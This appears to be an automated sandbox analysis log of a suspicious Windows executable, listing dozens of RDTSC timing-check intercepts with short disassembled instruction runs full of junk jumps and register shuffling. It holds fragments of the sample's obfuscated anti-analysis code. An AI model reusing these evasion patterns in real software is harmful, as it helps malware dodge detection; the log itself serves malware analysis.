Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A16EA second address: 11A1707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 jp 00007FF1610B8676h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF1610B867Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A1870 second address: 11A1876 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A1F29 second address: 11A1F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610B8680h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF1610B867Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jno 00007FF1610B8676h 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4DCE second address: 11A4DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4DD2 second address: 11A4DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4FEC second address: 11A4FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A65B8 second address: 11A65BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A65BD second address: 11A65E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007FF1610D0706h 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF1610D070Ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jl 00007FF1610D072Ch 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A65E4 second address: 11A65EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A7D35 second address: 11A7D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A7D40 second address: 11A7D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9C5B second address: 11A9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D0714h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C98EF second address: 10C98F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55803A8 second address: 55803FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF1610D0717h 0x00000011 or si, 38FEh 0x00000016 jmp 00007FF1610D0719h 0x0000001b popfd 0x0000001c movzx ecx, dx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55803FB second address: 5580466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FF1610B8680h 0x0000000a jmp 00007FF1610B8682h 0x0000000f pop esi 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007FF1610B8687h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FF1610B8686h 0x00000021 and al, FFFFFFE8h 0x00000024 jmp 00007FF1610B867Bh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5580544 second address: 5580548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0579 second address: 55A05FB instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FF1610B8682h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 mov di, cx 0x00000014 pushfd 0x00000015 jmp 00007FF1610B8686h 0x0000001a adc esi, 53483898h 0x00000020 jmp 00007FF1610B867Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a pushad 0x0000002b movzx ecx, di 0x0000002e pushfd 0x0000002f jmp 00007FF1610B8681h 0x00000034 add ah, 00000036h 0x00000037 jmp 00007FF1610B8681h 0x0000003c popfd 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A05FB second address: 55A05FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A05FF second address: 55A0605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0605 second address: 55A061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D0711h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A061A second address: 55A069B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a call 00007FF1610B8688h 0x0000000f call 00007FF1610B8682h 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 movzx eax, bx 0x00000019 popad 0x0000001a mov dword ptr [esp], ecx 0x0000001d pushad 0x0000001e call 00007FF1610B8689h 0x00000023 mov ax, F8B7h 0x00000027 pop esi 0x00000028 popad 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d movsx ebx, cx 0x00000030 pushfd 0x00000031 jmp 00007FF1610B867Ah 0x00000036 and cx, 86D8h 0x0000003b jmp 00007FF1610B867Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A069B second address: 55A06A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A06A0 second address: 55A0720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF1610B8685h 0x0000000a xor ah, 00000076h 0x0000000d jmp 00007FF1610B8681h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [esp], esi 0x00000019 pushad 0x0000001a mov cx, 7503h 0x0000001e pushfd 0x0000001f jmp 00007FF1610B8688h 0x00000024 or esi, 7B324AC8h 0x0000002a jmp 00007FF1610B867Bh 0x0000002f popfd 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp-04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF1610B8685h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0720 second address: 55A0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 call 00007FF1610D0718h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0749 second address: 55A074D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A074D second address: 55A0753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0753 second address: 55A075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A07AC second address: 55A07C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0075 second address: 55A008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d mov edi, 4C775260h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A008A second address: 55A0134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 0Dh 0x00000006 popad 0x00000007 popad 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007FF1610D070Ch 0x0000000f call 00007FF1610D0709h 0x00000014 jmp 00007FF1610D0710h 0x00000019 push eax 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d movsx edx, ax 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007FF1610D070Fh 0x0000002a mov eax, dword ptr [eax] 0x0000002c pushad 0x0000002d pushad 0x0000002e mov edx, 4DDCF238h 0x00000033 popad 0x00000034 mov bl, cl 0x00000036 popad 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b jmp 00007FF1610D0716h 0x00000040 pop eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop esi 0x00000046 pushfd 0x00000047 jmp 00007FF1610D0719h 0x0000004c and eax, 77BE3236h 0x00000052 jmp 00007FF1610D0711h 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0134 second address: 55A015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 233068BFh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF1610B867Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A015A second address: 55A021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5278C2B1h 0x00000010 jmp 00007FF1610D0716h 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b pushad 0x0000001c mov esi, 5CDC483Dh 0x00000021 mov dh, ah 0x00000023 popad 0x00000024 push ebp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF1610D0710h 0x0000002c sbb eax, 3A89D548h 0x00000032 jmp 00007FF1610D070Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007FF1610D0718h 0x0000003e or esi, 133997A8h 0x00000044 jmp 00007FF1610D070Bh 0x00000049 popfd 0x0000004a popad 0x0000004b mov dword ptr [esp], eax 0x0000004e pushad 0x0000004f mov cx, 25BBh 0x00000053 jmp 00007FF1610D0710h 0x00000058 popad 0x00000059 sub esp, 18h 0x0000005c pushad 0x0000005d jmp 00007FF1610D070Eh 0x00000062 mov ax, 7911h 0x00000066 popad 0x00000067 xchg eax, ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A021D second address: 55A0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0223 second address: 55A026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0710h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF1610D070Bh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF1610D070Bh 0x00000019 jmp 00007FF1610D0713h 0x0000001e popfd 0x0000001f mov si, B32Fh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A026C second address: 55A031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 call 00007FF1610B8687h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 push eax 0x00000011 jmp 00007FF1610B867Dh 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov dword ptr [esp], esi 0x0000001b jmp 00007FF1610B8687h 0x00000020 xchg eax, edi 0x00000021 jmp 00007FF1610B8686h 0x00000026 push eax 0x00000027 pushad 0x00000028 mov edi, 78DE80F4h 0x0000002d pushfd 0x0000002e jmp 00007FF1610B867Dh 0x00000033 and esi, 692C62B6h 0x00000039 jmp 00007FF1610B8681h 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 mov dx, ax 0x00000045 popad 0x00000046 mov eax, dword ptr [75AF4538h] 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FF1610B8680h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A031A second address: 55A031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A031F second address: 55A0406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF1610B8687h 0x0000000a jmp 00007FF1610B8683h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007FF1610B8686h 0x0000001b xor eax, ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF1610B867Dh 0x00000025 adc esi, 7081C836h 0x0000002b jmp 00007FF1610B8681h 0x00000030 popfd 0x00000031 mov dx, ax 0x00000034 popad 0x00000035 mov al, FFh 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007FF1610B8684h 0x0000003e mov dword ptr [esp], eax 0x00000041 jmp 00007FF1610B8680h 0x00000046 lea eax, dword ptr [ebp-10h] 0x00000049 jmp 00007FF1610B8680h 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FF1610B867Dh 0x0000005d sbb ah, 00000056h 0x00000060 jmp 00007FF1610B8681h 0x00000065 popfd 0x00000066 mov ebx, eax 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0406 second address: 55A0434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E0DEh 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [ebp-18h], esp 0x0000000f jmp 00007FF1610D0711h 0x00000014 mov eax, dword ptr fs:[00000018h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, 263Eh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55901CC second address: 55901F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8685h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF1610B867Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55901F5 second address: 559021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1610D0717h 0x00000008 mov ah, A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559021B second address: 559021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559021F second address: 5590236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590236 second address: 559026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1610B867Fh 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov di, si 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF1610B8682h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559026C second address: 5590272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590272 second address: 5590276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590276 second address: 559029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FF1610D0715h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559029A second address: 55902DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 movzx ecx, dx 0x00000008 popad 0x00000009 push esp 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e movzx ecx, bx 0x00000011 popad 0x00000012 mov dword ptr [esp], ebx 0x00000015 jmp 00007FF1610B8683h 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c pushad 0x0000001d mov esi, 79615421h 0x00000022 push esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 movzx ecx, dx 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF1610B867Bh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590414 second address: 5590431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590431 second address: 5590437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590437 second address: 559043B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559043B second address: 559043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559043F second address: 559045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF1610D0715h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55904F6 second address: 55904FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55904FB second address: 5590529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [ebp+08h] 0x0000000d jmp 00007FF1610D0718h 0x00000012 lea eax, dword ptr [ebp-2Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590529 second address: 559052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559052D second address: 559054A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559054A second address: 5590580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FF1610B867Ch 0x00000010 mov esi, 127937E1h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF1610B867Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590580 second address: 5590592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D070Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590592 second address: 55905CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FF1610B8687h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF1610B8685h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55905CA second address: 5590675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FF1610D0712h 0x0000000f call 00007FF1610D0712h 0x00000014 pop eax 0x00000015 pop edi 0x00000016 jmp 00007FF1610D0710h 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007FF1610D0710h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 jmp 00007FF1610D070Eh 0x00000029 pushfd 0x0000002a jmp 00007FF1610D0712h 0x0000002f jmp 00007FF1610D0715h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 jmp 00007FF1610D0711h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov di, 887Eh 0x00000044 mov dx, AE8Ah 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55906A8 second address: 55906DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF1610B867Fh 0x00000009 and ax, E33Eh 0x0000000e jmp 00007FF1610B8689h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55906DC second address: 55906EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55906EA second address: 55906F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55906F1 second address: 559072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1610D070Eh 0x00000008 mov esi, 4BCBE781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FF1610D0719h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559072A second address: 559072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559072F second address: 5590008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 289BF9E0h 0x00000008 mov dx, D40Ch 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FF1D15DE61Dh 0x00000015 xor eax, eax 0x00000017 jmp 00007FF1610A9E3Ah 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f leave 0x00000020 retn 0004h 0x00000023 nop 0x00000024 sub esp, 04h 0x00000027 mov edi, eax 0x00000029 xor ebx, ebx 0x0000002b cmp edi, 00000000h 0x0000002e je 00007FF1610D0814h 0x00000034 call 00007FF16576EB67h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590008 second address: 559000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559000C second address: 5590010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590010 second address: 5590016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
